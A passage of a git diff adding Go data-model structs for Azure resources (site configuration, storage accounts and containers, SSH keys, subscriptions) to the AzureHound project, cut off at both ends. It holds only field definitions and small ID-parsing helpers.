`json:"tokenEncryptionKeyId,omitempty"` + + // Specifies the verified publisher of the application which this service principal represents. + VerifiedPublisher VerifiedPublisher `json:"verifiedPublisher,omitempty"` +} diff --git a/models/azure/site_config.go b/models/azure/site_config.go new file mode 100644 index 0000000..ad1b4a8 --- /dev/null +++ b/models/azure/site_config.go @@ -0,0 +1,152 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type SiteConfig struct { + AcrUseManagedIdentityCreds bool `json:"acrUseManagedIdentityCreds,omitempty"` + AcrUserManagedIdentityID string `json:"acrUserManagedIdentityID,omitempty"` + AlwaysOn bool `json:"alwaysOn,omitempty"` + ApiDefinition ApiDefinitionInfo `json:"apiDefinition,omitempty"` + ApiManagementConfig ApiManagementConfig `json:"apiManagementConfig,omitempty"` + AppCommandLine string `json:"appCommandLine,omitempty"` + AppSettings []NameValuePair `json:"appSettings,omitempty"` + AutoHealEnabled bool `json:"autoHealEnabled,omitempty"` + AutoHealRules string `json:"autoHealRules,omitempty"` + AutoSwapSlotName string `json:"autoSwapSlotName,omitempty"` + AzureStorageAccounts map[string]AzureStorageInfoValue `json:"azureStorageAccounts,omitempty"` + ConnectionStrings []ConnStringInfo `json:"connectionStrings,omitempty"` + Cors CorsSettings `json:"cors,omitempty"` + DefaultDocuments []string `json:"defaultDocuments,omitempty"` + DetailedErrorLoggingEnabled bool `json:"detailedErrorLoggingEnabled,omitempty"` + DocumentRoot string `json:"documentRoot,omitempty"` + Experiments Experiments `json:"experiments,omitempty"` + FtpsState enums.FtpsState `json:"ftpsState,omitempty"` + FunctionAppScaleLimit int `json:"functionAppScaleLimit,omitempty"` + FunctionsRuntimeScaleMonitoringEnabled bool `json:"functionsRuntimeScaleMonitoringEnabled,omitempty"` + HandlerMappings []HandlerMapping `json:"handlerMappings,omitempty"` + HealthCheckPath string `json:"healthCheckPath,omitempty"` + Http20Enabled bool `json:"http20Enabled,omitempty"` + HttpLoggingEnabled bool `json:"httpLoggingEnabled,omitempty"` + IpSecurityRestrictions []IpSecurityRestriction `json:"ipSecurityRestrictions,omitempty"` + JavaContainer string `json:"javaContainer,omitempty"` + JavaContainerVersion string `json:"javaContainerVersion,omitempty"` + JavaVersion string `json:"javaVersion,omitempty"` + KeyVaultReferenceIdentity string `json:"keyVaultReferenceIdentity,omitempty"` + Limits SiteLimits `json:"limits,omitempty"` + LinuxFxVersion string `json:"linuxFxVersion,omitempty"` + LoadBalancing enums.SiteLoadBalancing `json:"loadBalancing,omitempty"` + LocalMySqlEnabled bool `json:"localMySqlEnabled,omitempty"` + LogsDirectorySizeLimit int `json:"logsDirectorySizeLimit,omitempty"` + MachineKey SiteMachineKey `json:"machineKey,omitempty"` + ManagedPipelineMode enums.ManagedPipelineMode `json:"managedPipelineMode,omitempty"` + ManagedServiceIdentityId int `json:"managedServiceIdentityId,omitempty"` + MinTlsVersion enums.SupportedTlsVersions `json:"minTlsVersion,omitempty"` + MinimumElasticInstanceCount int `json:"minimumElasticInstanceCount,omitempty"` + NetFrameworkVersion string `json:"netFrameworkVersion,omitempty"` + NodeVersion string `json:"nodeVersion,omitempty"` + NumberOfWorkers int `json:"numberOfWorkers,omitempty"` + PhpVersion string `json:"phpVersion,omitempty"` + PowerShellVersion string `json:"powerShellVersion,omitempty"` + PreWarmedInstanceCount int `json:"preWarmedInstanceCount,omitempty"` + PublicNetworkAccess string `json:"publicNetworkAccess,omitempty"` + PublishingUsername string `json:"publishingUsername,omitempty"` + Push PushSettings `json:"push,omitempty"` + PythonVersion string `json:"pythonVersion,omitempty"` + RemoteDebuggingEnabled bool `json:"remoteDebuggingEnabled,omitempty"` + RemoteDebuggingVersion string `json:"remoteDebuggingVersion,omitempty"` + RequestTracingEnabled bool `json:"requestTracingEnabled,omitempty"` + RequestTracingExpirationTime string `json:"requestTracingExpirationTime,omitempty"` + ScmIpSecurityRestrictions []IpSecurityRestriction `json:"scmIpSecurityRestrictions,omitempty"` + ScmIpSecurityRestrictionsUseMain bool `json:"scmIpSecurityRestrictionsUseMain,omitempty"` + ScmMinTlsVersion enums.SupportedTlsVersions `json:"scmMinTlsVersion,omitempty"` + ScmType enums.ScmType `json:"scmType,omitempty"` + TracingOptions string `json:"tracingOptions,omitempty"` + Use32BitWorkerProcess bool `json:"use32BitWorkerProcess,omitempty"` + VirtualApplications []VirtualApplication `json:"virtualApplications,omitempty"` + VnetName string `json:"vnetName,omitempty"` + VnetPrivatePortsCount int `json:"vnetPrivatePortsCount,omitempty"` + VnetRouteAllEnabled bool `json:"vnetRouteAllEnabled,omitempty"` + WebSocketsEnabled bool `json:"webSocketsEnabled,omitempty"` + WebsiteTimeZone string `json:"websiteTimeZone,omitempty"` + WindowsFxVersion string `json:"windowsFxVersion,omitempty"` + XManagedServiceIdentityId int `json:"xManagedServiceIdentityId,omitempty"` + + //Following ones have been found in testing, but not present in the documentation + AntivirusScanEnabled bool `json:"antivirusScanEnabled,omitempty"` + AzureMonitorLogCategories interface{} `json:"azureMonitorLogCategories,omitempty"` + CustomAppPoolIdentityAdminState interface{} `json:"customAppPoolIdentityAdminState,omitempty"` + CustomAppPoolIdentityTenantState interface{} `json:"customAppPoolIdentityTenantState,omitempty"` + ElasticWebAppScaleLimit interface{} `json:"elasticWebAppScaleLimit,omitempty"` + FileChangeAuditEnabled bool `json:"fileChangeAuditEnabled,omitempty"` + Http20ProxyFlag interface{} `json:"http20ProxyFlag,omitempty"` + IpSecurityRestrictionsDefaultAction interface{} `json:"ipSecurityRestrictionsDefaultAction,omitempty"` + Metadata interface{} `json:"metadata,omitempty"` + MinTlsCipherSuite interface{} `json:"minTlsCipherSuite,omitempty"` + PublishingPassword interface{} `json:"publishingPassword,omitempty"` + RoutingRules interface{} `json:"routingRules,omitempty"` + RuntimeADUser interface{} `json:"runtimeADUser,omitempty"` + RuntimeADUserPassword interface{} `json:"runtimeADUserPassword,omitempty"` + ScmIpSecurityRestrictionsDefaultAction interface{} `json:"scmIpSecurityRestrictionsDefaultAction,omitempty"` + SitePort interface{} `json:"sitePort,omitempty"` + StorageType interface{} `json:"storageType,omitempty"` + SupportedTlsCipherSuites interface{} `json:"supportedTlsCipherSuites,omitempty"` + WinAuthAdminState interface{} `json:"winAuthAdminState,omitempty"` + WinAuthTenantState interface{} `json:"winAuthTenantState,omitempty"` +} + +type ApiDefinitionInfo struct { + Url string `json:"url,omitempty"` +} + +type ApiManagementConfig struct { + Id string `json:"id,omitempty"` +} + +type CorsSettings struct { + AllowedOrigins []string `json:"allowedOrigins,omitempty"` + SupportCredentials bool `json:"supportCredentials,omitempty"` +} + +type Experiments struct { + RampUpRules []RampUpRule `json:"rampUpRules,omitempty"` +} + +type RampUpRule struct { + ActionHostName string `json:"actionHostName,omitempty"` + ChangeDecisionCallbackUrl string `json:"changeDecisionCallbackUrl,omitempty"` + ChangeIntervalInMinutes int `json:"changeIntervalInMinutes,omitempty"` + ChangeStep int `json:"changeStep,omitempty"` + MaxReroutePercentage int `json:"maxReroutePercentage,omitempty"` + MinReroutePercentage int `json:"minReroutePercentage,omitempty"` + Name string `json:"name,omitempty"` + ReroutePercentage int `json:"reroutePercentage,omitempty"` +} + +type HandlerMapping struct { + Arguments string `json:"arguments,omitempty"` + Extension string `json:"extension,omitempty"` + ScriptProcessor string `json:"scriptProcessor,omitempty"` +} + +type SiteLimits struct { + MaxDiskSizeInMb int `json:"maxDiskSizeInMb,omitempty"` + MaxMemoryInMb int `json:"maxMemoryInMb,omitempty"` + MaxPercentageCpu int `json:"maxPercentageCpu,omitempty"` +} diff --git a/models/azure/site_machine_key.go b/models/azure/site_machine_key.go new file mode 100644 index 0000000..09af250 --- /dev/null +++ b/models/azure/site_machine_key.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type SiteMachineKey struct { + Decryption string `json:"decryption,omitempty"` + DecryptionKey string `json:"decryptionKey,omitempty"` + Validation string `json:"validation,omitempty"` + ValidationKey string `json:"validationKey,omitempty"` +} diff --git a/models/azure/sku.go b/models/azure/sku.go new file mode 100644 index 0000000..960bc27 --- /dev/null +++ b/models/azure/sku.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// SKU details +type Sku struct { + // The SKU family name. Only available option is "A" + Family string `json:"family,omitempty"` + + // SKU name to specify whether the key vault is a standard vault or a premium vault. + Name enums.VaultSku `json:"name,omitempty"` +} diff --git a/models/azure/slot_swap_status.go b/models/azure/slot_swap_status.go new file mode 100644 index 0000000..6801b27 --- /dev/null +++ b/models/azure/slot_swap_status.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type SlotSwapStatus struct { + DestinationSlotName string `json:"destinationSlotName,omitempty"` + SourceSlotName string `json:"sourceSlotName,omitempty"` + TimestampUtc string `json:"timestampUtc,omitempty"` +} diff --git a/models/azure/spa_application.go b/models/azure/spa_application.go new file mode 100644 index 0000000..40817f0 --- /dev/null +++ b/models/azure/spa_application.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings for a single-page application. +type SPAApplication struct { + // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization + // codes and access tokens are sent. + RedirectUris []string `json:"redirectUris,omitempty"` +} diff --git a/models/azure/ssh_config.go b/models/azure/ssh_config.go new file mode 100644 index 0000000..c7dcad5 --- /dev/null +++ b/models/azure/ssh_config.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// SSH configuration for Linux based VMs running on Azure. +type SshConfiguration struct { + // The list of SSH public keys used to authenticate with linux based VMs. + PublicKeys []SshPublicKey `json:"publicKeys,omitempty"` +} diff --git a/models/azure/ssh_public_key.go b/models/azure/ssh_public_key.go new file mode 100644 index 0000000..17d8ff2 --- /dev/null +++ b/models/azure/ssh_public_key.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains information about SSH certificate public key and the path on the Linux VM where the public key is placed. +type SshPublicKey struct { + // SSH public key certificate used to authenticate with the VM through ssh. + // The key needs to be at least 2048-bit and in ssh-rsa format. + // For creating ssh keys, see [Create SSH keys on Linux and Mac for Linux VMs in Azure](https://docs.microsoft.com/azure/virtual-machines/linux/create-ssh-keys-detailed). + KeyData string `json:"keyData,omitempty"` + + // Specifies the full path on the created VM where ssh public key is stored. + // If the file already exists, the specified key is appended to the file. Example: /home/user/.ssh/authorized_keys + Path string `json:"path,omitempty"` +} diff --git a/models/azure/storage_account.go b/models/azure/storage_account.go new file mode 100644 index 0000000..a422080 --- /dev/null +++ b/models/azure/storage_account.go @@ -0,0 +1,52 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type StorageAccount struct { + Entity + + ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Kind string `json:"kind,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Properties StorageAccountProperties `json:"properties,omitempty"` + Sku Sku `json:"sku,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s StorageAccount) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s StorageAccount) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/storage_account_primary_endpoints.go b/models/azure/storage_account_primary_endpoints.go new file mode 100644 index 0000000..889f8ec --- /dev/null +++ b/models/azure/storage_account_primary_endpoints.go @@ -0,0 +1,45 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type Endpoints struct { + Blob string `json:"blob,omitempty"` + DFS string `json:"dfs,omitempty"` + File string `json:"file,omitempty"` + InternetEndpoints StorageAccountInternetEndpoints `json:"internetEndpoints,omitempty"` + MicrosoftEndpoints StorageAccountMicrosoftEndpoints `json:"microsoftEndpoints,omitempty"` + Queue string `json:"queue,omitempty"` + Table string `json:"table,omitempty"` + Web string `json:"web,omitempty"` +} + +type StorageAccountInternetEndpoints struct { + Blob string `json:"blob,omitempty"` + DFS string `json:"dfs,omitempty"` + File string `json:"file,omitempty"` + Web string `json:"web,omitempty"` +} + +type StorageAccountMicrosoftEndpoints struct { + Blob string `json:"blob,omitempty"` + DFS string `json:"dfs,omitempty"` + File string `json:"file,omitempty"` + Queue string `json:"queue,omitempty"` + Table string `json:"table,omitempty"` + Web string `json:"web,omitempty"` +} diff --git a/models/azure/storage_account_props.go b/models/azure/storage_account_props.go new file mode 100644 index 0000000..005c071 --- /dev/null +++ b/models/azure/storage_account_props.go @@ -0,0 +1,79 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type StorageAccountProperties struct { + AccessTier enums.StorageAccountAccessTier `json:"accessTier,omitempty"` + AllowBlobPublicAccess bool `json:"allowBlobPublicAccess,omitempty"` + AllowCrossTenantReplication bool `json:"allowCrossTenantReplication,omitempty"` + AllowSharedKeyAccess bool `json:"allowSharedKeyAccess,omitempty"` + AllowedCopyScope enums.AllowedCopyScope `json:"allowedCopyScope,omitempty"` + AzureFilesIdentityBasedAuthentication AzureFilesIdentityBasedAuthentication `json:"azureFilesIdentityBasedAuthentication,omitempty"` + BlobRestoreStatus BlobRestoreStatus `json:"blobRestoreStatus,omitempty"` + CreationTime string `json:"creationTime,omitempty"` + CustomDomain StorageAccountCustomDomain `json:"customDomain,omitempty"` + DefaultToOAuthAuthentication bool `json:"defaultToOAuthAuthentication,omitempty"` + DnsEndpointType enums.DnsEndpointType `json:"dnsEndpointType,omitempty"` + Encryption StorageAccountEncryptionProperties `json:"encryption,omitempty"` + FailoverInProgress bool `json:"failoverInProgress,omitempty"` + GeoReplicationStats GeoReplicationStats `json:"geoReplicationStats,omitempty"` + ImmutableStorageWithVersioning ImmutableStorageAccount `json:"immutableStorageWithVersioning,omitempty"` + IsHnsEnabled bool `json:"isHnsEnabled,omitempty"` + IsLocalUserEnabled bool `json:"isLocalUserEnabled,omitempty"` + IsNfsV3Enabled bool `json:"isNfsV3Enabled,omitempty"` + IsSftpEnabled bool `json:"isSftpEnabled,omitempty"` + KeyCreationTime StorageAccountKeyCreationTime `json:"keyCreationTime,omitempty"` + KeyPolicy StorageAccountKeyPolicy `json:"keyPolicy,omitempty"` + LargeFileSharesState enums.GenericEnabledDisabled `json:"largeFileSharesState,omitempty"` + LastGeoFailoverTime string `json:"lastGeoFailoverTime,omitempty"` + MinimumTlsVersion enums.MinimumTlsVersion `json:"minimumTlsVersion,omitempty"` + NetworkAcls NetworkRuleSet `json:"networkAcls,omitempty"` + PrimaryEndpoints Endpoints `json:"primaryEndpoints,omitempty"` + PrimaryLocation string `json:"primaryLocation,omitempty"` + PrivateEndpointConnections []PrivateEndpointConnection `json:"privateEndpointConnections"` + ProvisioningState enums.ProvisioningState `json:"provisioningState,omitempty"` + PublicNetworkAccess enums.GenericEnabledDisabled `json:"availabilitySet,omitempty"` + RoutingPreference RoutingPreference `json:"routingPreference,omitempty"` + SasPolicy SasPolicy `json:"sasPolicy,omitempty"` + SecondaryEndpoints Endpoints `json:"secondaryEndpoints,omitempty"` + SecondaryLocation string `json:"secondaryLocation,omitempty"` + StatusOfPrimary enums.AccountStatus `json:"statusOfPrimary,omitempty"` + StatusOfSecondary enums.AccountStatus `json:"statusOfSecondary,omitempty"` + StorageAccountSkuConversionStatus StorageAccountSkuConversionStatus `json:"storageAccountSkuConversionStatus,omitempty"` + + SupportsHttpsTrafficOnly bool `json:"supportsHttpsTrafficOnly,omitempty"` +} + +type StorageAccountCustomDomain struct { + Name string `json:"name,omitempty"` + UseSubDomainName bool `json:"useSubDomainName,omitempty"` +} + +type StorageAccountKeyCreationTime struct { + Key1 string `json:"key1,omitempty"` + Key2 string `json:"key2,omitempty"` +} + +type StorageAccountKeyPolicy struct { + KeyExpirationPeriodInDays int `json:"keyExpirationPeriodInDays,omitempty"` +} + +type StorageAccountLargeFileSharesState struct { +} diff --git a/models/azure/storage_account_sku_conversion_status.go b/models/azure/storage_account_sku_conversion_status.go new file mode 100644 index 0000000..5894de5 --- /dev/null +++ b/models/azure/storage_account_sku_conversion_status.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type StorageAccountSkuConversionStatus struct { + EndTime string `json:"endTime,omitempty"` + SkuConversionStatus enums.SkuConversionStatus `json:"skuConversionStatus,omitempty"` + StartTime string `json:"startTime,omitempty"` + TargetSkuName enums.SkuName `json:"targetSkuName,omitempty"` +} diff --git a/models/azure/storage_container.go b/models/azure/storage_container.go new file mode 100644 index 0000000..5a22612 --- /dev/null +++ b/models/azure/storage_container.go @@ -0,0 +1,65 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type StorageContainer struct { + Entity + + Type string `json:"type,omitempty"` + Name string `json:"name,omitempty"` + Etag string `json:"etag,omitempty"` + Properties StorageContainerProperties `json:"properties,omitempty"` +} + +func (s StorageContainer) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s StorageContainer) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} + +func (s StorageContainer) StorageAccountName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 8 { + return parts[8] + } else { + return "" + } +} + +func (s StorageContainer) StorageAccountId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 9 { + return strings.Join(parts[:9], "/") + } else { + return "" + } +} diff --git a/models/azure/storage_container_legal_hold.go b/models/azure/storage_container_legal_hold.go new file mode 100644 index 0000000..3c59ce3 --- /dev/null +++ b/models/azure/storage_container_legal_hold.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type LegalHoldProperties struct { + HasLegalHold bool `json:"hasLegalHold,omitempty"` + ProtectedAppendWritesHistory ProtectedAppendWritesHistory `json:"protectedAppendWritesHistory,omitempty"` + Tags []TagProperty `json:"tags,omitempty"` +} + +type ProtectedAppendWritesHistory struct { + AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"` + Timestamp string `json:"timestamp,omitempty"` +} + +type TagProperty struct { + ObjectIdentifier string `json:"objectIdentifier,omitempty"` + Tag string `json:"tag,omitempty"` + TenantId string `json:"tenantId,omitempty"` + Timestamp string `json:"timestamp,omitempty"` + Upn string `json:"upn,omitempty"` +} diff --git a/models/azure/storage_container_props.go b/models/azure/storage_container_props.go new file mode 100644 index 0000000..d22a34a --- /dev/null +++ b/models/azure/storage_container_props.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type StorageContainerProperties struct { + DefaultEncryptionScope string `json:"defaultEncryptionScope,omitempty"` + Deleted bool `json:"deleted,omitempty"` + DeletedTime string `json:"deletedTime,omitempty"` + DenyEncryptionScopeOverride bool `json:"denyEncryptionScopeOverride,omitempty"` + EnableNfsV3AllSquash bool `json:"enableNfsV3AllSquash,omitempty"` + EnableNfsV3RootSquash bool `json:"enableNfsV3RootSquash,omitempty"` + HasImmutabilityPolicy bool `json:"hasImmutabilityPolicy,omitempty"` + HasLegalHold bool `json:"hasLegalHold,omitempty"` + ImmutabilityPolicy ImmutabilityPolicy `json:"immutabilityPolicy,omitempty"` + ImmutableStorageWithVersioning ImmutableStorageWithVersioning `json:"immutableStorageWithVersioning,omitempty"` + LastModifiedTime string `json:"lastModifiedTime,omitempty"` + LeaseDuration enums.LeaseDuration `json:"leaseDuration,omitempty"` + LeaseState enums.LeaseState `json:"leaseState,omitempty"` + LeaseStatus enums.LeaseStatus `json:"leaseStatus,omitempty"` + LegalHold LegalHoldProperties `json:"legalHold,omitempty"` + Metadata interface{} `json:"metadata,omitempty"` + PublicAccess enums.PublicAccess `json:"publicAccess,omitempty"` + RemainingRetentionDays int `json:"remainingRetentionDays,omitempty"` + Version string `json:"version,omitempty"` +} diff --git a/models/azure/storage_profile.go b/models/azure/storage_profile.go new file mode 100644 index 0000000..5c9e2a5 --- /dev/null +++ b/models/azure/storage_profile.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the storage settings for the virtual machine disks. +type StorageProfile struct { + // Specifies the parameters that are used to add a data disk to a virtual machine. + // For more information about disks, see About disks and VHDs for Azure virtual machines. + DataDisks []DataDisk `json:"dataDisks,omitempty"` + + // Specifies information about the image to use. You can specify information about platform images, marketplace + // images, or virtual machine images. This element is required when you want to use a platform image, marketplace + // image, or virtual machine image, but is not used in other creation operations. + ImageReference ImageReference `json:"imageReference,omitempty"` + + // Specifies information about the operating system disk used by the virtual machine. + // For more information about disks, see About disks and VHDs for Azure virtual machines. + OSDisk OSDisk `json:"osDisk,omitempty"` +} diff --git a/models/azure/sub_resource.go b/models/azure/sub_resource.go new file mode 100644 index 0000000..37e5041 --- /dev/null +++ b/models/azure/sub_resource.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type SubResource struct { + // The resource ID. + Id string `json:"id,omitempty"` +} diff --git a/models/azure/subscription.go b/models/azure/subscription.go new file mode 100644 index 0000000..b7f32c0 --- /dev/null +++ b/models/azure/subscription.go @@ -0,0 +1,51 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type Subscription struct { + Entity + + // The authorization source of the request. Valid values are one or more combinations of Legacy, RoleBased, + // Bypassed, Direct and Management. For example, 'Legacy, RoleBased'. + AuthorizationSource string 